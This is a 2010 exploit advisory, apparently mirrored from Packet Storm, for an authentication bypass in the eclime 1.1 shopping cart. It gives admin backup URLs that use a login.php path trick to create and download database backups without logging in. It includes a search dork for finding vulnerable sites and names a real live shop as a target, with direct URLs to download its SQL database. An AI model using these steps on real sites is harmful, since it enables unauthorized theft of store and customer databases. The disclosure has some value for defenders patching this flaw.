eclime 1.1 Bypass / Database Disclosure

🗓️ 19 Apr 2010 00:00:00Reported by indoushkaType

packetstorm🔗 packetstormsecurity.com👁 28 Views

eclime v1.1 has a backup vulnerability allowing database disclosure via download URLs.

`========================================================================================   
| # Title : eclime v1.1 => by Pass / Creat and Download Backup Vulnerability   
| # Author : indoushka   
| # email : [email protected]   
| # Home : www.iqs3cur1ty.com/vb   
| # Web Site : http://php.opensourcecms.com/scripts/redirect/download.php?id=302   
| # Dork : Powered by eclime.com   
| # Tested on: windows SP2 Français V.(Pnx2 2.0)   
| # Bug : Backup   
====================== Exploit By indoushka =================================  
# Exploit :   
------------------------------------------   
eclime v1.1 (March 2010)  
------------------------------------------  
eclime is a free opensource smarty based shopping cart  
build on osCommerce 2.2 solid engine, with many useful  
contributions added.  
  
------------------------------------------  
  
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backup  
  
http://127.0.0.1/eclime/admin/backup.php/login.php?action=backupnow  
  
to download buckup : http://127.0.0.1/eclime/admin/backup.php/login.php?action=download&file=db_comm-20100301222138.sql  
  
db_comm-20100301222138.sql chang it to the name of the backup and you cant download it with IE i download it with opera 10.10 + Mozilla Firefox  
  
test web site: http://www.spot-led.com/admin/backup.php/login.php?osCAdminID=buckup  
  
and fresh sql data to download http://www.spot-led.com/admin/backup.php/login.php?action=download&file=db_spotled-20100416162008.sql  
  
Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================  
Greetz :   
Exploit-db Team :   
(loneferret+Exploits+dookie2000ca)  
all my friend :  
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)  
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R http://www.ilegalintrusion.net/foro/  
www.securityreason.com * www.sa-hacker.com * www.alkrsan.net * www.mormoroth.net  
------------------------------------------------------------------------------------------------------------------------  
`

19 Apr 2010 00:00Current

7.4High risk

Vulners AI Score7.4